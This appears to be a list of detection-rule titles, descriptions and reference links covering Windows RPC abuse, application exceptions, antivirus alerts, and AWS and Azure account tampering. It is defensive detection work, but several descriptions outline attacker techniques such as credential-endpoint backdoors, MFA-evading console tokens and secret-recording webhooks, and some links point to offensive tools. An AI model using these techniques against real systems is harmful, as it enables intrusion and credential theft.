Remote Schedule Task Lateral Movement via ATSvc Detects remote RPC calls to create or execute a scheduled task via ATSvc https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931, https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md, https://github.com/zeronetworks/rpcfirewall, https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/
Remote Schedule Task Recon via AtScv Detects remote RPC calls to read information about scheduled tasks via AtScv https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931, https://github.com/zeronetworks/rpcfirewall, https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md, https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/
Possible DCSync Attack Detects remote RPC calls to MS-DRSR from non DC hosts, which could indicate DCSync / DCShadow attacks. https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-drsr/f977faaa-673e-4f66-b9bf-48c640241d47?redirectedfrom=MSDN, https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-DRSR.md, https://github.com/zeronetworks/rpcfirewall, https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/
Remote Event Log Recon Detects remote RPC calls to get event log information via EVEN or EVEN6 https://github.com/zeronetworks/rpcfirewall, https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/
Remote Encrypting File System Abuse Detects remote RPC calls to possibly abuse remote encryption service via MS-EFSR https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36942, https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-EFSR.md, https://github.com/zeronetworks/rpcfirewall, https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/
Remote Schedule Task Lateral Movement via ITaskSchedulerService Detects remote RPC calls to create or execute a scheduled task https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931, https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md, https://github.com/zeronetworks/rpcfirewall, https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/
Remote Schedule Task Recon via ITaskSchedulerService Detects remote RPC calls to read information about scheduled tasks https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931, https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md, https://github.com/zeronetworks/rpcfirewall, https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/
Remote Printing Abuse for Lateral Movement Detects remote RPC calls to possibly abuse remote printing service via MS-RPRN / MS-PAR https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527, https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/d42db7d5-f141-4466-8f47-0a4be14e2fc1, https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-pan/e44d984c-07d3-414c-8ffc-f8c8ad8512a8, https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-RPRN-PAR.md, https://github.com/zeronetworks/rpcfirewall, https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/
Remote DCOM/WMI Lateral Movement Detects remote RPC calls that performs remote DCOM operations. These could be abused for lateral movement via DCOM or WMI. https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/accf23b0-0f57-441c-9185-43041f1b0ee9, https://github.com/zeronetworks/rpcfirewall, https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/
Remote Registry Lateral Movement Detects remote RPC calls to modify the registry and possible execute code https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-rrp/0fa3191d-bb79-490a-81bd-54c2601b7a78, https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-RRP.md, https://github.com/zeronetworks/rpcfirewall, https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/
Remote Registry Recon Detects remote RPC calls to collect information https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-rrp/0fa3191d-bb79-490a-81bd-54c2601b7a78, https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-RRP.md, https://github.com/zeronetworks/rpcfirewall, https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/
Remote Server Service Abuse Detects remote RPC calls to possibly abuse remote encryption service via MS-SRVS https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/accf23b0-0f57-441c-9185-43041f1b0ee9, https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-SRVS.md, https://github.com/zeronetworks/rpcfirewall, https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/
Remote Server Service Abuse for Lateral Movement Detects remote RPC calls to possibly abuse remote encryption service via MS-EFSR https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/accf23b0-0f57-441c-9185-43041f1b0ee9, https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-SCMR.md, https://github.com/zeronetworks/rpcfirewall, https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/
Remote Schedule Task Lateral Movement via SASec Detects remote RPC calls to create or execute a scheduled task via SASec https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931, https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md, https://github.com/zeronetworks/rpcfirewall, https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/
Recon Activity via SASec Detects remote RPC calls to read information about scheduled tasks via SASec https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931, https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md, https://github.com/zeronetworks/rpcfirewall, https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/
SharpHound Recon Account Discovery Detects remote RPC calls useb by SharpHound to map remote connections and local group membership. https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-wkst/55118c55-2122-4ef9-8664-0c1ff9e168f3, https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-WKST.md, https://github.com/zeronetworks/rpcfirewall, https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/
SharpHound Recon Sessions Detects remote RPC calls useb by SharpHound to map remote connections and local group membership. https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/02b1f559-fda2-4ba3-94c2-806eb2777183, https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-SRVS.md, https://github.com/zeronetworks/rpcfirewall, https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/
Ruby on Rails Framework Exceptions Detects suspicious Ruby on Rails exceptions that could indicate exploitation attempts http://edgeguides.rubyonrails.org/security.html, http://guides.rubyonrails.org/action_controller_overview.html, https://stackoverflow.com/questions/25892194/does-rails-come-with-a-not-authorized-exception, https://github.com/rails/rails/blob/cd08e6bcc4cd8948fe01e0be1ea0c7ca60373a25/actionpack/lib/action_dispatch/middleware/exception_wrapper.rb
Spring Framework Exceptions Detects suspicious Spring framework exceptions that could indicate exploitation attempts https://docs.spring.io/spring-security/site/docs/current/api/overview-tree.html
Potential SpEL Injection In Spring Framework Detects potential SpEL Injection exploitation, which may lead to RCE. https://owasp.org/www-community/vulnerabilities/Expression_Language_Injection, https://www.wix.engineering/post/threat-and-vulnerability-hunting-with-application-server-error-logs
Suspicious SQL Error Messages Detects SQL error messages that indicate probing for an injection attack http://www.sqlinjection.net/errors
Potential Server Side Template Injection In Velocity Detects exceptions in velocity template renderer, this most likely happens due to dynamic rendering of user input and may lead to RCE. https://antgarsil.github.io/posts/velocity/, https://www.wix.engineering/post/threat-and-vulnerability-hunting-with-application-server-error-logs
Antivirus Exploitation Framework Detection Detects a highly relevant Antivirus alert that reports an exploitation framework. This event must not be ignored just because the AV has blocked the malware but investigate, how it came there in the first place. https://www.nextron-systems.com/?s=antivirus, https://www.virustotal.com/gui/file/925b0b28472d4d79b4bf92050e38cc2b8f722691c713fc28743ac38551bc3797, https://www.virustotal.com/gui/file/8f8daabe1c8ceb5710949283818e16c4aa8059bf2ce345e2f2c90b8692978424, https://www.virustotal.com/gui/file/d9669f7e3eb3a9cdf6a750eeb2ba303b5ae148a43e36546896f1d1801e912466
Antivirus Hacktool Detection Detects a highly relevant Antivirus alert that reports a hack tool or other attack tool. This event must not be ignored just because the AV has blocked the malware but investigate, how it came there in the first place. https://www.nextron-systems.com/2021/08/16/antivirus-event-analysis-cheat-sheet-v1-8-2/, https://www.nextron-systems.com/?s=antivirus
Antivirus Password Dumper Detection Detects a highly relevant Antivirus alert that reports a password dumper. This event must not be ignored just because the AV has blocked the malware but investigate, how it came there in the first place. https://www.nextron-systems.com/?s=antivirus, https://www.virustotal.com/gui/file/5fcda49ee7f202559a6cbbb34edb65c33c9a1e0bde9fa2af06a6f11b55ded619, https://www.virustotal.com/gui/file/a4edfbd42595d5bddb442c82a02cf0aaa10893c1bf79ea08b9ce576f82749448
Antivirus Ransomware Detection Detects a highly relevant Antivirus alert that reports ransomware. This event must not be ignored just because the AV has blocked the malware but investigate, how it came there in the first place. https://www.nextron-systems.com/?s=antivirus, https://www.virustotal.com/gui/file/43b0f7872900bd234975a0877744554f4f355dc57505517abd1ef611e1ce6916, https://www.virustotal.com/gui/file/c312c05ddbd227cbb08958876df2b69d0f7c1b09e5689eb9d93c5b357f63eff7, https://www.virustotal.com/gui/file/20179093c59bca3acc6ce9a4281e8462f577ffd29fd7bf51cf2a70d106062045, https://www.virustotal.com/gui/file/554db97ea82f17eba516e6a6fdb9dc04b1d25580a1eb8cb755eeb260ad0bd61d, https://www.virustotal.com/gui/file/69fe77dd558e281621418980040e2af89a2547d377d0f2875502005ce22bc95c, https://www.virustotal.com/gui/file/6f0f20da34396166df352bf301b3c59ef42b0bc67f52af3d541b0161c47ede05
Antivirus Web Shell Detection Detects a highly relevant Antivirus alert that reports a web shell. It's highly recommended to tune this rule to the specific strings used by your anti virus solution by downloading a big WebShell repository from e.g. github and checking the matches. This event must not be ignored just because the AV has blocked the malware but investigate, how it came there in the first place. https://www.nextron-systems.com/?s=antivirus, https://github.com/tennc/webshell, https://www.virustotal.com/gui/file/bd1d52289203866645e556e2766a21d2275877fbafa056a76fe0cf884b7f8819/detection, https://www.virustotal.com/gui/file/308487ed28a3d9abc1fec7ebc812d4b5c07ab025037535421f64c60d3887a3e8/detection, https://www.virustotal.com/gui/file/7d3cb8a8ff28f82b07f382789247329ad2d7782a72dde9867941f13266310c80/detection, https://www.virustotal.com/gui/file/e841675a4b82250c75273ebf0861245f80c6a1c3d5803c2d995d9d3b18d5c4b5/detection, https://www.virustotal.com/gui/file/a80042c61a0372eaa0c2c1e831adf0d13ef09feaf71d1d20b216156269045801/detection, https://www.virustotal.com/gui/file/b219f7d3c26f8bad7e175934cd5eda4ddb5e3983503e94ff07d39c0666821b7e/detection, https://www.virustotal.com/gui/file/b8702acf32fd651af9f809ed42d15135f842788cd98d81a8e1b154ee2a2b76a2/detection, https://www.virustotal.com/gui/file/13ae8bfbc02254b389ab052aba5e1ba169b16a399d9bc4cb7414c4a73cd7dc78/detection
Antivirus Relevant File Paths Alerts Detects an Antivirus alert in a highly relevant file path or with a relevant file name. This event must not be ignored just because the AV has blocked the malware but investigate, how it came there in the first place. https://www.nextron-systems.com/?s=antivirus
Suspicious SQL Query Detects suspicious SQL query keywrods that are often used during recon, exfiltration or destructive activities. Such as dropping tables and selecting wildcard fields https://github.com/sqlmapproject/sqlmap
AWS Attached Malicious Lambda Layer Detects when an user attached a Lambda layer to an existing function to override a library that is in use by the function, where their malicious code could utilize the function's IAM role for AWS API calls. This would give an adversary access to the privileges associated with the Lambda service role that is attached to that function. https://docs.aws.amazon.com/lambda/latest/dg/API_UpdateFunctionConfiguration.html
AWS CloudTrail Important Change Detects disabling, deleting and updating of a Trail https://docs.aws.amazon.com/awscloudtrail/latest/userguide/best-practices-security.html
Malicious Usage Of IMDS Credentials Outside Of AWS Infrastructure Detects when an instance identity has taken an action that isn't inside SSM. This can indicate that a compromised EC2 instance is being used as a pivot point. https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-identity-roles.html, https://ermetic.com/blog/aws/aws-ec2-imds-what-you-need-to-know/, https://www.packetmischief.ca/2023/07/31/amazon-ec2-credential-exfiltration-how-it-happens-and-how-to-mitigate-it/#lifting-credentials-from-imds-this-is-why-we-cant-have-nice-things
New Network ACL Entry Added Detects that network ACL entries have been added to a route table which could indicate that new attack vectors have been opened up in the AWS account. https://www.gorillastack.com/blog/real-time-events/important-aws-cloudtrail-security-events-tracking/
New Network Route Added Detects the addition of a new network route to a route table in AWS. https://www.gorillastack.com/blog/real-time-events/important-aws-cloudtrail-security-events-tracking/
Ingress/Egress Security Group Modification Detects when an account makes changes to the ingress or egress rules of a security group. This can indicate that an attacker is attempting to open up new attack vectors in the account, that they are trying to exfiltrate data over the network, or that they are trying to allow machines in that VPC/Subnet to contact a C&C server. https://www.gorillastack.com/blog/real-time-events/important-aws-cloudtrail-security-events-tracking/
LoadBalancer Security Group Modification Detects changes to the security groups associated with an Elastic Load Balancer (ELB) or Application Load Balancer (ALB). This can indicate that a misconfiguration allowing more traffic into the system than required, or could indicate that an attacker is attempting to enable new connections into a VPC or subnet controlled by the account. https://www.gorillastack.com/blog/real-time-events/important-aws-cloudtrail-security-events-tracking/
RDS Database Security Group Modification Detects changes to the security group entries for RDS databases. This can indicate that a misconfiguration has occurred which potentially exposes the database to the public internet, a wider audience within the VPC or that removal of valid rules has occurred which could impact the availability of the database to legitimate services and users. https://www.gorillastack.com/blog/real-time-events/important-aws-cloudtrail-security-events-tracking/
Potential Malicious Usage of CloudTrail System Manager Detect when System Manager successfully executes commands against an instance. https://github.com/elastic/detection-rules/blob/main/rules/integrations/aws/initial_access_via_system_manager.toml
AWS Config Disabling Channel/Recorder Detects AWS Config Service disabling https://docs.aws.amazon.com/config/latest/developerguide/cloudtrail-log-files-for-aws-config.html
AWS Console GetSigninToken Potential Abuse Detects potentially suspicious events involving "GetSigninToken". An adversary using the "aws_consoler" tool can leverage this console API to create temporary federated credential that help obfuscate which AWS credential is compromised (the original access key) and enables the adversary to pivot from the AWS CLI to console sessions without the need for MFA using the new access key issued in this request. https://github.com/NetSPI/aws_consoler, https://www.crowdstrike.com/blog/analysis-of-intrusion-campaign-targeting-telecom-and-bpo-companies/
SES Identity Has Been Deleted Detects an instance of an SES identity being deleted via the "DeleteIdentity" event. This may be an indicator of an adversary removing the account that carried out suspicious or malicious activities https://unit42.paloaltonetworks.com/compromised-cloud-compute-credentials/
AWS SAML Provider Deletion Activity Detects the deletion of an AWS SAML provider, potentially indicating malicious intent to disrupt administrative or security team access. An attacker can remove the SAML provider for the information security team or a team of system administrators, to make it difficult for them to work and investigate at the time of the attack and after it. https://docs.aws.amazon.com/IAM/latest/APIReference/API_DeleteSAMLProvider.html
AWS S3 Bucket Versioning Disable Detects when S3 bucket versioning is disabled. Threat actors use this technique during AWS ransomware incidents prior to deleting S3 objects. https://invictus-ir.medium.com/ransomware-in-the-cloud-7f14805bbe82
AWS Key Pair Import Activity Detects the import of SSH key pairs into AWS EC2, which may indicate an attacker attempting to gain unauthorized access to instances. This activity could lead to initial access, persistence, or privilege escalation, potentially compromising sensitive data and operations. https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_ImportKeyPair.html
AWS EC2 Disable EBS Encryption Identifies disabling of default Amazon Elastic Block Store (EBS) encryption in the current region. Disabling default encryption does not change the encryption status of your existing volumes. https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DisableEbsEncryptionByDefault.html
AWS EC2 Startup Shell Script Change Detects changes to the EC2 instance startup script. The shell script will be executed as root/SYSTEM every time the specific instances are booted up. https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/ec2__startup_shell_script/main.py#L9
AWS EC2 VM Export Failure An attempt to export an AWS EC2 instance has been detected. A VM Export might indicate an attempt to extract information from an instance. https://docs.aws.amazon.com/vm-import/latest/userguide/vmexport.html#export-instance
AWS ECS Task Definition That Queries The Credential Endpoint Detects when an Elastic Container Service (ECS) Task Definition includes a command to query the credential endpoint. This can indicate a potential adversary adding a backdoor to establish persistence or escalate privileges. https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/ecs__backdoor_task_def/main.py, https://docs.aws.amazon.com/AmazonECS/latest/APIReference/API_RegisterTaskDefinition.html, https://docs.aws.amazon.com/AmazonECS/latest/developerguide/task-iam-roles.html
AWS EFS Fileshare Modified or Deleted Detects when a EFS Fileshare is modified or deleted. You can't delete a file system that is in use. If the file system has any mount targets, the adversary must first delete them, so deletion of a mount will occur before deletion of a fileshare. https://docs.aws.amazon.com/efs/latest/ug/API_DeleteFileSystem.html
AWS EFS Fileshare Mount Modified or Deleted Detects when a EFS Fileshare Mount is modified or deleted. An adversary breaking any file system using the mount target that is being deleted, which might disrupt instances or applications using those mounts. https://docs.aws.amazon.com/efs/latest/ug/API_DeleteMountTarget.html
AWS EKS Cluster Created or Deleted Identifies when an EKS cluster is created or deleted. https://any-api.com/amazonaws_com/eks/docs/API_Description
AWS ElastiCache Security Group Created Detects when an ElastiCache security group has been created. https://github.com/elastic/detection-rules/blob/598f3d7e0a63221c0703ad9a0ea7e22e7bc5961e/rules/integrations/aws/persistence_elasticache_security_group_creation.toml
AWS ElastiCache Security Group Modified or Deleted Identifies when an ElastiCache security group has been modified or deleted. https://github.com/elastic/detection-rules/blob/7d5efd68603f42be5e125b5a6a503b2ef3ac0f4e/rules/integrations/aws/impact_elasticache_security_group_modified_or_deleted.toml
Potential Bucket Enumeration on AWS Looks for potential enumeration of AWS buckets via ListBuckets. https://github.com/Lifka/hacking-resources/blob/c2ae355d381bd0c9f0b32c4ead049f44e5b1573f/cloud-hacking-cheat-sheets.md, https://jamesonhacking.blogspot.com/2020/12/pivoting-to-private-aws-s3-buckets.html, https://securitycafe.ro/2022/12/14/aws-enumeration-part-ii-practical-enumeration/
AWS GuardDuty Important Change Detects updates of the GuardDuty list of trusted IPs, perhaps to disable security alerts against malicious IPs. https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/guardduty__whitelist_ip/main.py#L9
AWS IAM Backdoor Users Keys Detects AWS API key creation for a user by another user. Backdoored users can be used to obtain persistence in the AWS environment. Also with this alert, you can detect a flow of AWS keys in your org. https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/iam__backdoor_users_keys/main.py
AWS IAM S3Browser Templated S3 Bucket Policy Creation Detects S3 browser utility creating Inline IAM policy containing default S3 bucket name placeholder value of "". https://permiso.io/blog/s/unmasking-guivil-new-cloud-threat-actor
AWS IAM S3Browser LoginProfile Creation Detects S3 Browser utility performing reconnaissance looking for existing IAM Users without a LoginProfile defined then (when found) creating a LoginProfile. https://permiso.io/blog/s/unmasking-guivil-new-cloud-threat-actor
AWS IAM S3Browser User or AccessKey Creation Detects S3 Browser utility creating IAM User or AccessKey. https://permiso.io/blog/s/unmasking-guivil-new-cloud-threat-actor
New AWS Lambda Function URL Configuration Created Detects when a user creates a Lambda function URL configuration, which could be used to expose the function to the internet and potentially allow unauthorized access to the function's IAM role for AWS API calls. This could give an adversary access to the privileges associated with the Lambda service role that is attached to that function. https://docs.aws.amazon.com/lambda/latest/dg/API_CreateFunctionUrlConfig.html, https://cloud.hacktricks.xyz/pentesting-cloud/aws-security/aws-privilege-escalation/aws-lambda-privesc, https://www.wiz.io/blog/how-to-set-secure-defaults-on-aws
AWS Glue Development Endpoint Activity Detects possible suspicious glue development endpoint activity. https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/, https://docs.aws.amazon.com/glue/latest/webapi/API_CreateDevEndpoint.html
AWS RDS Master Password Change Detects the change of database master password. It may be a part of data exfiltration. https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/rds__explore_snapshots/main.py
Modification or Deletion of an AWS RDS Cluster Detects modifications to an RDS cluster or its deletion, which may indicate potential data exfiltration attempts, unauthorized access, or exposure of sensitive information. https://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_ModifyDBCluster.html, https://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_DeleteDBCluster.html, https://cloud.hacktricks.xyz/pentesting-cloud/aws-security/aws-privilege-escalation/aws-rds-privesc#rds-modifydbinstance
Restore Public AWS RDS Instance Detects the recovery of a new public database instance from a snapshot. It may be a part of data exfiltration. https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/rds__explore_snapshots/main.py
AWS Root Credentials Detects AWS root account usage https://docs.aws.amazon.com/IAM/latest/UserGuide/id_root-user.html
AWS Route 53 Domain Transfer Lock Disabled Detects when a transfer lock was removed from a Route 53 domain. It is recommended to refrain from performing this action unless intending to transfer the domain to a different registrar. https://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/integrations/aws/persistence_route_53_domain_transfer_lock_disabled.toml, https://docs.aws.amazon.com/Route53/latest/APIReference/API_Operations_Amazon_Route_53.html, https://docs.aws.amazon.com/Route53/latest/APIReference/API_domains_DisableDomainTransferLock.html
AWS Route 53 Domain Transferred to Another Account Detects when a request has been made to transfer a Route 53 domain to another AWS account. https://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/integrations/aws/persistence_route_53_domain_transferred_to_another_account.toml
AWS S3 Data Management Tampering Detects when a user tampers with S3 data management in Amazon Web Services. https://github.com/elastic/detection-rules/pull/1145/files, https://docs.aws.amazon.com/AmazonS3/latest/API/API_Operations.html, https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketLogging.html, https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketWebsite.html, https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketEncryption.html, https://docs.aws.amazon.com/AmazonS3/latest/userguide/setting-repl-config-perm-overview.html, https://docs.aws.amazon.com/AmazonS3/latest/API/API_RestoreObject.html
AWS SecurityHub Findings Evasion Detects the modification of the findings on SecurityHub. https://docs.aws.amazon.com/cli/latest/reference/securityhub/
AWS Snapshot Backup Exfiltration Detects the modification of an EC2 snapshot's permissions to enable access from another account https://www.justice.gov/file/1080281/download
AWS Identity Center Identity Provider Change Detects a change in the AWS Identity Center (FKA AWS SSO) identity provider. A change in identity provider allows an attacker to establish persistent access or escalate privileges via user impersonation. https://docs.aws.amazon.com/singlesignon/latest/userguide/app-enablement.html, https://docs.aws.amazon.com/singlesignon/latest/userguide/sso-info-in-cloudtrail.html, https://docs.aws.amazon.com/service-authorization/latest/reference/list_awsiamidentitycentersuccessortoawssinglesign-on.html
AWS STS AssumeRole Misuse Identifies the suspicious use of AssumeRole. Attackers could move laterally and escalate privileges. https://github.com/elastic/detection-rules/pull/1214, https://docs.aws.amazon.com/STS/latest/APIReference/API_AssumeRole.html
AWS STS GetSessionToken Misuse Identifies the suspicious use of GetSessionToken. Tokens could be created and used by attackers to move laterally and escalate privileges. https://github.com/elastic/detection-rules/pull/1213, https://docs.aws.amazon.com/STS/latest/APIReference/API_GetSessionToken.html
AWS Suspicious SAML Activity Identifies when suspicious SAML activity has occurred in AWS. An adversary could gain backdoor access via SAML. https://docs.aws.amazon.com/IAM/latest/APIReference/API_UpdateSAMLProvider.html, https://docs.aws.amazon.com/STS/latest/APIReference/API_AssumeRoleWithSAML.html
AWS User Login Profile Was Modified Detects activity when someone is changing passwords on behalf of other users. An attacker with the "iam:UpdateLoginProfile" permission on other users can change the password used to login to the AWS console on any user that already has a login profile setup. https://github.com/RhinoSecurityLabs/AWS-IAM-Privilege-Escalation
Azure Active Directory Hybrid Health AD FS New Server This detection uses azureactivity logs (Administrative category) to identify the creation or update of a server instance in an Azure AD Hybrid health AD FS service. A threat actor can create a new AD Health ADFS service and create a fake server instance to spoof AD FS signing logs. There is no need to compromise an on-prem AD FS server. This can be done programmatically via HTTP requests to Azure. https://o365blog.com/post/hybridhealthagent/
Azure Active Directory Hybrid Health AD FS Service Delete This detection uses azureactivity logs (Administrative category) to identify the deletion of an Azure AD Hybrid health AD FS service instance in a tenant. A threat actor can create a new AD Health ADFS service and create a fake server to spoof AD FS signing logs. The health AD FS service can then be deleted after it is not longer needed via HTTP requests to Azure. https://o365blog.com/post/hybridhealthagent/
User Added to an Administrator's Azure AD Role User Added to an Administrator's Azure AD Role https://m365internals.com/2021/07/13/what-ive-learned-from-doing-a-year-of-cloud-forensics-in-azure-ad/
Azure Application Deleted Identifies when a application is deleted in Azure. https://learn.microsoft.com/en-us/entra/identity/monitoring-health/reference-audit-activities#application-proxy
Azure Application Gateway Modified or Deleted Identifies when a application gateway is modified or deleted. https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations
Azure Application Security Group Modified or Deleted Identifies when a application security group is modified or deleted. https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations
Azure Application Credential Modified Identifies when a application credential is modified. https://www.cloud-architekt.net/auditing-of-msi-and-service-principals/
Azure Container Registry Created or Deleted Detects when a Container Registry is created or deleted. https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes, https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/, https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/, https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1, https://attack.mitre.org/matrices/enterprise/cloud/
Number Of Resource Creation Or Deployment Activities Number of VM creations or deployment activities occur in Azure via the azureactivity log. https://github.com/Azure/Azure-Sentinel/blob/e534407884b1ec5371efc9f76ead282176c9e8bb/Detections/AzureActivity/Creating_Anomalous_Number_Of_Resources_detection.yaml
Azure Device No Longer Managed or Compliant Identifies when a device in azure is no longer managed or compliant https://learn.microsoft.com/en-us/entra/identity/monitoring-health/reference-audit-activities#core-directory
Azure Device or Configuration Modified or Deleted Identifies when a device or device configuration in azure is modified or deleted. https://learn.microsoft.com/en-us/entra/identity/monitoring-health/reference-audit-activities#core-directory
Azure DNS Zone Modified or Deleted Identifies when DNS zone is modified or deleted. https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes
Azure Firewall Modified or Deleted Identifies when a firewall is created, modified, or deleted. https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations
Azure Firewall Rule Collection Modified or Deleted Identifies when Rule Collections (Application, NAT, and Network) is being modified or deleted. https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations
Granting Of Permissions To An Account Identifies IPs from which users grant access to other users on azure resources and alerts when a previously unseen source IP address is used. https://github.com/Azure/Azure-Sentinel/blob/e534407884b1ec5371efc9f76ead282176c9e8bb/Detections/AzureActivity/Granting_Permissions_To_Account_detection.yaml
Azure Keyvault Key Modified or Deleted Identifies when a Keyvault Key is modified or deleted in Azure. https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations
Azure Key Vault Modified or Deleted Identifies when a key vault is modified or deleted. https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations
Azure Keyvault Secrets Modified or Deleted Identifies when secrets are modified or deleted in Azure. https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations
Azure Kubernetes Admission Controller Identifies when an admission controller is executed in Azure Kubernetes. A Kubernetes Admission controller intercepts, and possibly modifies, requests to the Kubernetes API server. The behavior of this admission controller is determined by an admission webhook (MutatingAdmissionWebhook or ValidatingAdmissionWebhook) that the user deploys in the cluster. An adversary can use such webhooks as the MutatingAdmissionWebhook for obtaining persistence in the cluster. For example, attackers can intercept and modify the pod creation operations in the cluster and add their malicious container to every created pod. An adversary can use the webhook ValidatingAdmissionWebhook, which could be used to obtain access credentials. An adversary could use the webhook to intercept the requests to the API server, record secrets, and other sensitive information. https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes
